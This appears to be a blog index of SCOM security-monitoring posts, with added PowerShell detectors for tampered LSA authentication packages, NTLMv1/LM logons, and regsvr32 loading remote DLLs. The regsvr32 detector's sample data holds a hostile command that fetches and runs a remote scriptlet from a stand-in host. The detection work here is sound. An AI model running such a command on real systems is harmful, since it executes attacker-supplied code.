Reliable Time Monitor False Positives for AD Domain Member Monitoring

Disclaimer: Due to changes in the MSFT corporate blogging policy, I’m moving all of my content to the following location. Please reference all future content from that location. Thanks. I had a chance to work with a customer on importing the new AD MP for SCOM. I like this MP in particular, as it’s much…

Security Monitoring: Using SCOM to Detect Bypassed Authentication Package Back Door

One persistence method that an attacker can use is to modify an operating system's authentication packages in order to give the attacker a back door for…
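The package lists that this back door lives in are plain REG_MULTI_SZ values under the LSA key, so they can be audited against a baseline before SCOM ever sees an alert. The following is an added example, not code from the post or from the Security Monitoring management pack. The registry key and value names are the real ones; the default baseline lists are an assumption for a stock Windows build and must be tuned per environment (a domain controller, for instance, also carries rassfm in Notification Packages, and a host where WDigest has been removed will not list it).

```powershell
# Added example: report LSA package entries that are not in a known-good baseline.
# LSA loads every DLL named in these values as SYSTEM at boot, so an unexpected
# entry (or any entry given as a path) is the persistence the post describes.
function Get-LsaPackageDrift {
    [CmdletBinding()]
    param(
        # Baselines below are assumptions for a default install; adjust for your fleet.
        [string[]]$AuthPackagesBaseline         = @('msv1_0'),
        [string[]]$SecurityPackagesBaseline     = @('kerberos', 'msv1_0', 'schannel', 'wdigest', 'tspkg', 'pku2u'),
        [string[]]$NotificationPackagesBaseline = @('scecli')
    )

    $lsa      = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'
    $osConfig = Join-Path $lsa 'OSConfig'

    # Each check: registry key, REG_MULTI_SZ value name, expected entries.
    $checks = @(
        @{ Key = $lsa;      Name = 'Authentication Packages'; Baseline = $AuthPackagesBaseline },
        @{ Key = $osConfig; Name = 'Security Packages';       Baseline = $SecurityPackagesBaseline },
        @{ Key = $lsa;      Name = 'Notification Packages';   Baseline = $NotificationPackagesBaseline }
    )

    foreach ($c in $checks) {
        try {
            $current = @((Get-ItemProperty -Path $c.Key -Name $c.Name -ErrorAction Stop).($c.Name))
        } catch {
            Write-Warning "Could not read '$($c.Name)' under $($c.Key): $_"
            continue
        }

        foreach ($entry in $current) {
            $trimmed = $entry.Trim()
            if (-not $trimmed) { continue }   # skip the empty-string placeholder some builds keep

            # Stock entries are bare package names; a drive or UNC path, or an explicit
            # .dll extension, is how an attacker points LSA at a DLL of their own.
            $isPath  = ($trimmed -match '[\\/]') -or ($trimmed -match '\.dll$')
            $isKnown = $c.Baseline -contains $trimmed
            if (-not $isPath -and $isKnown) { continue }

            $reason = if ($isPath) { 'path-style entry' } else { 'not in baseline' }
            [pscustomobject]@{
                Key    = $c.Key
                Value  = $c.Name
                Entry  = $entry
                Reason = $reason
            }
        }
    }
}

# Usage: run in an elevated session. No output means every entry matched the baseline.
Get-LsaPackageDrift | Format-Table -AutoSize
```

Wrapping the function in a SCOM timed script monitor and treating any emitted object as an unhealthy state gives the same detection the post describes, with the baseline supplied as an override rather than hard-coded.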

Security Monitoring: Detecting Wdigest Authentication

One of the noisier items in the Security Monitoring Management Pack is the monitor that triggers against all Windows 2008 R2 and below systems if the…

Security Monitoring: Using SCOM to Detect SMB1 Authentications

I think at this point, we are all aware of the dangers posed by continuing SMB1 authentication in an environment. The WannaCry ransomware worm infected more than…

Security Monitoring: Using SCOM to detect NTLMv1 and LanManager Authentication Types

One of the big changes in the next release of the Security Monitoring management pack will be reports designed to let administrators know if they are using…
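The only place Windows says whether an NTLM logon negotiated LM, NTLMv1 or NTLMv2 is the "Package Name (NTLM only)" field of Security event 4624 (EventData name LmPackageName), which is what a report like the one described above has to key on. The following is an added example, not code from the post or from the management pack; the EventData field names are the real ones for 4624, and the sample event at the bottom is constructed for illustration.

```powershell
# Added example: flag 4624 logons whose NTLM package was LM or NTLM V1.
# Takes the event XML (EventRecord.ToXml()) so the same function works on the
# live Security log and on exported .evtx files.
function Get-LegacyNtlmLogon {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory, ValueFromPipeline)][string]$EventXml
    )
    process {
        $xml = [xml]$EventXml
        if ([string]$xml.Event.System.EventID -ne '4624') { return }

        # Flatten <Data Name="..."> elements into a hashtable keyed by field name.
        $data = @{}
        foreach ($d in $xml.Event.EventData.Data) {
            $data[$d.GetAttribute('Name')] = $d.InnerText
        }

        # LmPackageName is "-" for Kerberos and other non-NTLM logons: nothing to flag.
        $family = switch -Regex ($data['LmPackageName']) {
            '^LM$'      { 'LanManager' }
            '^NTLM V1$' { 'NTLMv1' }
            '^NTLM V2$' { 'NTLMv2' }
            default     { $null }
        }
        if ($family -ne 'LanManager' -and $family -ne 'NTLMv1') { return }

        [pscustomobject]@{
            Family      = $family
            User        = "$($data['TargetDomainName'])\$($data['TargetUserName'])"
            LogonType   = $data['LogonType']
            Workstation = $data['WorkstationName']
            SourceIp    = $data['IpAddress']
            AuthPackage = $data['AuthenticationPackageName']
        }
    }
}

# Constructed sample: a network logon (type 3) that negotiated NTLMv1 and is flagged.
$sample = @'
<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><EventID>4624</EventID><Channel>Security</Channel></System>
  <EventData>
    <Data Name="TargetUserName">jdoe</Data>
    <Data Name="TargetDomainName">CONTOSO</Data>
    <Data Name="LogonType">3</Data>
    <Data Name="AuthenticationPackageName">NTLM</Data>
    <Data Name="WorkstationName">WS-OLDAPP</Data>
    <Data Name="LmPackageName">NTLM V1</Data>
    <Data Name="IpAddress">10.1.2.3</Data>
  </EventData>
</Event>
'@
$sample | Get-LegacyNtlmLogon | Format-Table -AutoSize

# Against the live Security log (elevated session):
# Get-WinEvent -FilterHashtable @{ LogName = 'Security'; Id = 4624 } |
#     ForEach-Object { $_.ToXml() } | Get-LegacyNtlmLogon
```

Grouping the output by Workstation and SourceIp is what turns this into the inventory the post is after: it lists the clients that still need the LmCompatibilityLevel fix before NTLMv1 and LM can be refused at the domain controllers.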

A Deep Dive into Dynamic Group Calculation and How it Affects SCOM Performance

I would first like to give a special thanks to John Mckeown and Nick Masiuk, both of whom provided major contributions to the work described below…

Stupid Little Problem with SNMP Version Tags

I don't normally get to work with SNMP, but I've been at a customer this week where we needed to configure SCOM to do SNMP monitoring. …

SCOM Security Monitoring in Action: Detecting an Attacker

This is a fun little story today, but I got to see first-hand how our security management pack works during a real, non-simulated attack. I…

Using SCOM to Capture Registering Remotely Located DLL Files

I've started browsing some sites that are cataloguing known attack vectors and came across this particular vulnerability that is worth discussing. Many seasoned IT pros understand…
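Registering a DLL on Windows goes through regsvr32.exe, and the attack the title refers to is regsvr32 being handed a file that does not live on a local disk. The capture therefore has to come from process-creation telemetry with the command line included (Security event 4688 with "Include command line in process creation events" enabled, or Sysmon event 1). The following is an added example, not code from the post or from the management pack; it takes the NewProcessName/CommandLine pair that 4688 carries, and the sample records are constructed.

```powershell
# Added example: flag regsvr32 invocations whose target is a URL or a UNC path.
function Test-RemoteRegsvr32 {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)][string]$NewProcessName,
        [Parameter(Mandatory)][AllowEmptyString()][string]$CommandLine
    )
    # Key on the image name rather than on the command line text, so that
    # "regsvr32" typed in argv[0] is not required for a hit.
    if ([IO.Path]::GetFileName($NewProcessName) -notmatch '^regsvr32\.exe$') { return $null }

    # A remote location is an http(s) URL or a \\server\share path anywhere in the arguments.
    $remote = [regex]::Matches($CommandLine, '(?i)\bhttps?://\S+|\\\\[^\\\s]+\\\S+')
    if ($remote.Count -eq 0) { return $null }

    [pscustomobject]@{
        Process      = $NewProcessName
        RemoteTarget = $remote[0].Value
        Silent       = [bool]($CommandLine -match '(^|\s)/s(\s|$)')   # /s suppresses the result dialog
        InstallArg   = [bool]($CommandLine -match '(^|\s)/i:')        # /i: hands a string (often a URL) to DllInstall
        CommandLine  = $CommandLine
    }
}

# Constructed sample 4688 records: two remote targets (flagged) and one local DLL (not flagged).
$samples = @(
    @{ NewProcessName = 'C:\Windows\System32\regsvr32.exe'
       CommandLine    = 'regsvr32 /s /n /u /i:http://files.example.test/run.sct scrobj.dll' },
    @{ NewProcessName = 'C:\Windows\SysWOW64\regsvr32.exe'
       CommandLine    = 'regsvr32 /s \\fileserver\share\tools\helper.dll' },
    @{ NewProcessName = 'C:\Windows\System32\regsvr32.exe'
       CommandLine    = 'regsvr32 /s "C:\Program Files\Vendor\vendor.dll"' }
)
$samples |
    ForEach-Object { Test-RemoteRegsvr32 -NewProcessName $_.NewProcessName -CommandLine $_.CommandLine } |
    Format-Table -AutoSize
```

To run it against the live log, pull 4688 events with Get-WinEvent, read the NewProcessName and CommandLine fields out of each event's XML, and pass them to the function; without the command-line audit setting the CommandLine field is empty and only the UNC case can be caught, from the NewProcessName itself.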